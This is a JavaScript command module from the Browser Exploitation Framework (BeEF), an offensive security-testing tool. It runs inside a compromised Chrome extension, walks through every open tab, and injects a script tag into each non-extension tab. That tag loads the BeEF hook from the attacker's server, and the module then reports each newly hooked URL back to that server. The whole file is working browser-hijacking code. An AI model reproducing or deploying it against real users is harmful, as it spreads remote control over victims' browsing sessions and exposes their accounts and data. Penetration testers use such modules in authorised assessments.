1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
        var beefHookUri = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
10

11
        chrome.windows.getAll({"populate" : true}, function(windows) {
12
			for(i in windows) {
13
				if(windows[i].type=="normal") {
14
					chrome.tabs.getAllInWindow(windows[i].id,function(tabs){
15
						for(t in tabs) {
16
                            //antisnatchor: if the extension has her own tabs open, we want to precent injecting the hook
17
                            //also there. Chrome extensions with tabs and http/s permissions cannot access URIs with protocol
18
                            // handlers chrome-extension://, and most of them will not have permissions to do so.
19
                            if(tabs[t].url.substring(0,16) != "chrome-extension"){
20
                                chrome.tabs.executeScript(tabs[t].id,{code:"newScript=document.createElement('script'); newScript.src='"
21
                                    + beefHookUri + "'; newScript.setAttribute('onload','beef_init()'); document.getElementsByTagName('head')[0].appendChild(newScript);"})
22

23
						        //send back the new domain that will be hooked :-)
24
                                beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Successfully injected BeEF hook on: ' + tabs[t].url);
25
                            }
26
						}
27
					})
28
				}
29
			}
30
		});
31
});
32

33

34